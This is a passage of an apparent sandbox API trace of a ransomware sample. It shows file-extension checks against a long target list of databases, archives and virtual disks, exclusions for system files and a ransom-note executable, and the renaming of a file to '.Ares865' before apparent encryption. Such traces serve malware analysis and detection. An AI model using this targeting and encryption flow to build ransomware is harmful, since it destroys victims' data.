lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.128] lstrlenW (lpString="ecx") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.128] lstrlenW (lpString="edb") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.128] lstrlenW (lpString="epim") returned 4 [0085.128] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.128] lstrlenW (lpString="fcd") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.128] lstrlenW (lpString="fdb") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.128] lstrlenW (lpString="fic") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.128] lstrlenW (lpString="flexolibrary") returned 12 [0085.128] lstrcmpiW (lpString1="ertile30.bmp", lpString2="flexolibrary") returned -1 [0085.128] lstrlenW (lpString="fm5") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.128] lstrlenW (lpString="fmp") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.128] lstrlenW (lpString="fmp12") returned 5 [0085.128] lstrcmpiW (lpString1="0.bmp", lpString2="fmp12") returned -1 [0085.128] lstrlenW (lpString="fmpsl") returned 5 [0085.128] lstrcmpiW (lpString1="0.bmp", lpString2="fmpsl") returned -1 [0085.128] lstrlenW (lpString="fol") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.128] lstrlenW (lpString="fp3") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.128] lstrlenW (lpString="fp4") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.128] lstrlenW (lpString="fp5") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.128] lstrlenW (lpString="fp7") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.129] lstrlenW (lpString="fpt") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.129] lstrlenW (lpString="frm") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.129] lstrlenW (lpString="gdb") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.129] lstrlenW (lpString="gdb") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.129] lstrlenW (lpString="grdb") returned 4 [0085.129] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.129] lstrlenW (lpString="gwi") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.129] lstrlenW (lpString="hdb") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.129] lstrlenW (lpString="his") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.129] lstrlenW (lpString="ib") returned 2 [0085.129] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.129] lstrlenW (lpString="idb") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.129] lstrlenW (lpString="ihx") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.129] lstrlenW (lpString="itdb") returned 4 [0085.129] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.129] lstrlenW (lpString="itw") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.129] lstrlenW (lpString="jet") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.129] lstrlenW (lpString="jtx") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.129] lstrlenW (lpString="kdb") returned 3 [0085.129] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.129] lstrlenW (lpString="kexi") returned 4 [0085.129] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.129] lstrlenW (lpString="kexic") returned 5 [0085.129] lstrcmpiW (lpString1="0.bmp", lpString2="kexic") returned -1 [0085.129] lstrlenW (lpString="kexis") returned 5 [0085.130] lstrcmpiW (lpString1="0.bmp", lpString2="kexis") returned -1 [0085.130] lstrlenW (lpString="lgc") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.130] lstrlenW (lpString="lwx") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.130] lstrlenW (lpString="maf") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.130] lstrlenW (lpString="maq") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.130] lstrlenW (lpString="mar") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.130] lstrlenW (lpString="marshal") returned 7 [0085.130] lstrcmpiW (lpString1="e30.bmp", lpString2="marshal") returned -1 [0085.130] lstrlenW (lpString="mas") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.130] lstrlenW (lpString="mav") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.130] lstrlenW (lpString="maw") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.130] lstrlenW (lpString="mdbhtml") returned 7 [0085.130] lstrcmpiW (lpString1="e30.bmp", lpString2="mdbhtml") returned -1 [0085.130] lstrlenW (lpString="mdn") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.130] lstrlenW (lpString="mdt") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.130] lstrlenW (lpString="mfd") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.130] lstrlenW (lpString="mpd") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.130] lstrlenW (lpString="mrg") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.130] lstrlenW (lpString="mud") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.130] lstrlenW (lpString="mwb") returned 3 [0085.130] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.130] lstrlenW (lpString="myd") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.131] lstrlenW (lpString="ndf") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.131] lstrlenW (lpString="nnt") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.131] lstrlenW (lpString="nrmlib") returned 6 [0085.131] lstrcmpiW (lpString1="30.bmp", lpString2="nrmlib") returned -1 [0085.131] lstrlenW (lpString="ns2") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.131] lstrlenW (lpString="ns3") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.131] lstrlenW (lpString="ns4") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.131] lstrlenW (lpString="nsf") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.131] lstrlenW (lpString="nv") returned 2 [0085.131] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.131] lstrlenW (lpString="nv2") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.131] lstrlenW (lpString="nwdb") returned 4 [0085.131] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.131] lstrlenW (lpString="nyf") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.131] lstrlenW (lpString="odb") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.131] lstrlenW (lpString="odb") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.131] lstrlenW (lpString="oqy") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.131] lstrlenW (lpString="ora") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.131] lstrlenW (lpString="orx") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.131] lstrlenW (lpString="owc") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.131] lstrlenW (lpString="p96") returned 3 [0085.131] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.132] lstrlenW (lpString="p97") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.132] lstrlenW (lpString="pan") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.132] lstrlenW (lpString="pdb") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.132] lstrlenW (lpString="pdm") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.132] lstrlenW (lpString="pnz") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.132] lstrlenW (lpString="qry") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.132] lstrlenW (lpString="qvd") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.132] lstrlenW (lpString="rbf") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.132] lstrlenW (lpString="rctd") returned 4 [0085.132] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.132] lstrlenW (lpString="rod") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.132] lstrlenW (lpString="rodx") returned 4 [0085.132] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.132] lstrlenW (lpString="rpd") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.132] lstrlenW (lpString="rsd") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.132] lstrlenW (lpString="sas7bdat") returned 8 [0085.132] lstrcmpiW (lpString1="le30.bmp", lpString2="sas7bdat") returned -1 [0085.132] lstrlenW (lpString="sbf") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.132] lstrlenW (lpString="scx") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.132] lstrlenW (lpString="sdb") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.132] lstrlenW (lpString="sdc") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.132] lstrlenW (lpString="sdf") returned 3 [0085.132] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.133] lstrlenW (lpString="sis") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.133] lstrlenW (lpString="spq") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.133] lstrlenW (lpString="te") returned 2 [0085.133] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.133] lstrlenW (lpString="teacher") returned 7 [0085.133] lstrcmpiW (lpString1="e30.bmp", lpString2="teacher") returned -1 [0085.133] lstrlenW (lpString="tmd") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.133] lstrlenW (lpString="tps") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.133] lstrlenW (lpString="trc") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.133] lstrlenW (lpString="trc") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.133] lstrlenW (lpString="trm") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.133] lstrlenW (lpString="udb") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.133] lstrlenW (lpString="udl") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.133] lstrlenW (lpString="usr") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.133] lstrlenW (lpString="v12") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.133] lstrlenW (lpString="vis") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.133] lstrlenW (lpString="vpd") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.133] lstrlenW (lpString="vvv") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.133] lstrlenW (lpString="wdb") returned 3 [0085.133] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.133] lstrlenW (lpString="wmdb") returned 4 [0085.133] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.133] lstrlenW (lpString="wrk") returned 3 [0085.134] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.134] lstrlenW (lpString="xdb") returned 3 [0085.134] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.134] lstrlenW (lpString="xld") returned 3 [0085.134] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.134] lstrlenW (lpString="xmlff") returned 5 [0085.134] lstrcmpiW (lpString1="0.bmp", lpString2="xmlff") returned -1 [0085.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.Ares865") returned 90 [0085.134] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.ares865"), dwFlags=0x1) returned 1 [0085.138] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.139] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.140] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.140] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.140] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.141] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.144] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.145] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.145] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.145] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.145] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.146] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.146] CloseHandle (hObject=0x15c) returned 1 [0085.146] CloseHandle (hObject=0x118) returned 1 [0085.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.146] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.147] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="aoldtz.exe") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2=".") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="..") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="windows") returned -1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="bootmgr") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="temp") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="pagefile.sys") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="boot") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="ids.txt") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="ntuser.dat") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="perflogs") returned 1 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2="MSBuild") returned 1 [0085.147] lstrlenW (lpString="usertile31.bmp") returned 14 [0085.147] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 82 [0085.147] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile31.bmp" | out: lpString1="usertile31.bmp") returned="usertile31.bmp" [0085.147] lstrlenW (lpString="usertile31.bmp") returned 14 [0085.147] lstrlenW (lpString="Ares865") returned 7 [0085.147] lstrcmpiW (lpString1="e31.bmp", lpString2="Ares865") returned 1 [0085.147] lstrlenW (lpString=".dll") returned 4 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2=".dll") returned 1 [0085.147] lstrlenW (lpString=".lnk") returned 4 [0085.147] lstrcmpiW (lpString1="usertile31.bmp", lpString2=".lnk") returned 1 [0085.147] lstrlenW (lpString=".ini") returned 4 [0085.148] lstrcmpiW (lpString1="usertile31.bmp", lpString2=".ini") returned 1 [0085.148] lstrlenW (lpString=".sys") returned 4 [0085.148] lstrcmpiW (lpString1="usertile31.bmp", lpString2=".sys") returned 1 [0085.148] lstrlenW (lpString="usertile31.bmp") returned 14 [0085.148] lstrlenW (lpString="bak") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.148] lstrlenW (lpString="ba_") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.148] lstrlenW (lpString="dbb") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.148] lstrlenW (lpString="vmdk") returned 4 [0085.148] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.148] lstrlenW (lpString="rar") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.148] lstrlenW (lpString="zip") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.148] lstrlenW (lpString="tgz") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.148] lstrlenW (lpString="vbox") returned 4 [0085.148] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.148] lstrlenW (lpString="vdi") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.148] lstrlenW (lpString="vhd") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.148] lstrlenW (lpString="vhdx") returned 4 [0085.148] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.148] lstrlenW (lpString="avhd") returned 4 [0085.148] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.148] lstrlenW (lpString="db") returned 2 [0085.148] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.148] lstrlenW (lpString="db2") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.148] lstrlenW (lpString="db3") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.148] lstrlenW (lpString="dbf") returned 3 [0085.148] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.148] lstrlenW (lpString="mdf") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.149] lstrlenW (lpString="mdb") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.149] lstrlenW (lpString="sql") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.149] lstrlenW (lpString="sqlite") returned 6 [0085.149] lstrcmpiW (lpString1="31.bmp", lpString2="sqlite") returned -1 [0085.149] lstrlenW (lpString="sqlite3") returned 7 [0085.149] lstrcmpiW (lpString1="e31.bmp", lpString2="sqlite3") returned -1 [0085.149] lstrlenW (lpString="sqlitedb") returned 8 [0085.149] lstrcmpiW (lpString1="le31.bmp", lpString2="sqlitedb") returned -1 [0085.149] lstrlenW (lpString="xml") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.149] lstrlenW (lpString="$er") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.149] lstrlenW (lpString="4dd") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.149] lstrlenW (lpString="4dl") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.149] lstrlenW (lpString="^^^") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.149] lstrlenW (lpString="abs") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.149] lstrlenW (lpString="abx") returned 3 [0085.149] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.149] lstrlenW (lpString="accdb") returned 5 [0085.149] lstrcmpiW (lpString1="1.bmp", lpString2="accdb") returned -1 [0085.149] lstrlenW (lpString="accdc") returned 5 [0085.149] lstrcmpiW (lpString1="1.bmp", lpString2="accdc") returned -1 [0085.149] lstrlenW (lpString="accde") returned 5 [0085.149] lstrcmpiW (lpString1="1.bmp", lpString2="accde") returned -1 [0085.149] lstrlenW (lpString="accdr") returned 5 [0085.149] lstrcmpiW (lpString1="1.bmp", lpString2="accdr") returned -1 [0085.149] lstrlenW (lpString="accdt") returned 5 [0085.149] lstrcmpiW (lpString1="1.bmp", lpString2="accdt") returned -1 [0085.149] lstrlenW (lpString="accdw") returned 5 [0085.149] lstrcmpiW (lpString1="1.bmp", lpString2="accdw") returned -1 [0085.149] lstrlenW (lpString="accft") returned 5 [0085.150] lstrcmpiW (lpString1="1.bmp", lpString2="accft") returned -1 [0085.150] lstrlenW (lpString="adb") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.150] lstrlenW (lpString="adb") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.150] lstrlenW (lpString="ade") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.150] lstrlenW (lpString="adf") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.150] lstrlenW (lpString="adn") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.150] lstrlenW (lpString="adp") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.150] lstrlenW (lpString="alf") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.150] lstrlenW (lpString="ask") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.150] lstrlenW (lpString="btr") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.150] lstrlenW (lpString="cat") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.150] lstrlenW (lpString="cdb") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.150] lstrlenW (lpString="ckp") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.150] lstrlenW (lpString="cma") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.150] lstrlenW (lpString="cpd") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.150] lstrlenW (lpString="dacpac") returned 6 [0085.150] lstrcmpiW (lpString1="31.bmp", lpString2="dacpac") returned -1 [0085.150] lstrlenW (lpString="dad") returned 3 [0085.150] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.150] lstrlenW (lpString="dadiagrams") returned 10 [0085.150] lstrcmpiW (lpString1="tile31.bmp", lpString2="dadiagrams") returned 1 [0085.151] lstrlenW (lpString="daschema") returned 8 [0085.151] lstrcmpiW (lpString1="le31.bmp", lpString2="daschema") returned 1 [0085.151] lstrlenW (lpString="db-journal") returned 10 [0085.151] lstrcmpiW (lpString1="tile31.bmp", lpString2="db-journal") returned 1 [0085.151] lstrlenW (lpString="db-shm") returned 6 [0085.151] lstrcmpiW (lpString1="31.bmp", lpString2="db-shm") returned -1 [0085.151] lstrlenW (lpString="db-wal") returned 6 [0085.151] lstrcmpiW (lpString1="31.bmp", lpString2="db-wal") returned -1 [0085.151] lstrlenW (lpString="dbc") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.151] lstrlenW (lpString="dbs") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.151] lstrlenW (lpString="dbt") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.151] lstrlenW (lpString="dbv") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.151] lstrlenW (lpString="dbx") returned 3 [0085.151] lstrcmpiW (lpString1="bmp", 